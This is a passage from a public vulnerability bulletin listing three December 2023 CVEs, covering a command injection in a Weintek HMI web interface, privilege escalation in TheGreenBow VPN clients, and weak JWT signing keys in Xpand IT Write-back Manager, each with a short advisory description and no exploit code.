weintek -- cmt2078x_easyweb | An authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter. | 2023-12-19 | not yet calculated | CVE-2023-50466 cve@mitre.org |
windows -- multiple_products | An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file. | 2023-12-19 | not yet calculated | CVE-2023-47267 cve@mitre.org |
xpand_it -- write-back_manager | Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack. | 2023-12-20 | not yet calculated | CVE-2023-27172 cve@mitre.org |
Please share your thoughts
We recently updated our anonymous product survey; we’d welcome your feedback.